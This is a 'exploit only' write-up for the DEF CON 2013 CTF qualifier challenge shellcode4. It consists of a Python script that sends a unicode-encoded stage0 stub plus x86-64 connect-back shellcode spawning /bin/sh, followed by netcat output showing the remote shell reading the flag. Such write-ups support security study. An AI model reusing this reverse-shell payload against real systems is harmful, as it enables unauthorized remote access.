Defcon CTF 2013 Qual - shellcode4 (Exploit only)

Category : Pwnable (\xff\xe4\xcc)

penser

Summary : unicode shellcode, overwrite below byte

Exploit

#!/usr/bin/python from socket import * from struct import pack import time HOST = "penser.shallweplayaga.me" PORT = 8273 """ 51 # push %rcx 00 45 00 # align 59 # pop %rcx 00 45 00 52 # push %rdx 00 45 00 58 # pop %rax 00 45 00 32 00 # xor (%rax), %al 50 # push %rax 00 45 00 5a # pop %rdx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 0a # add    %cl,(%rdx)           00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 4b 00 #### will be replaced """ stage0 = "\x51\x45\x59\x45\x52\x45\x58\x45\x32\x50\x45\x5a\x45\x59\x45\x59\x45\x59\x45\x59\x0a\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x4b\x00\x00" shellcode = "\x90"*0x100 +\ "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97" +\ "\x48\xb9\x02\x00\x7a\x69\x00\x00\x00\x00\x51\x48\x89\xe6" +\ "\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" +\ "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f" +\ "\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48" +\ "\x89\xe6\x0f\x05" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) s.send("\xc3\x02\x00\x00") time.sleep(0.5) s.send(stage0+shellcode) time.sleep(0.5) s.close()

root@ubuntu:~# ./exploit.py -------------------------------------------------------------- root@ubuntu:~# nc -lv 31337 Connection from 54.226.204.186 port 31337 [tcp/*] accepted id uid=1001(penser) gid=1001(penser) groups=1001(penser) cat key The key is: TBDHelloooookdkdkiekdiekdiek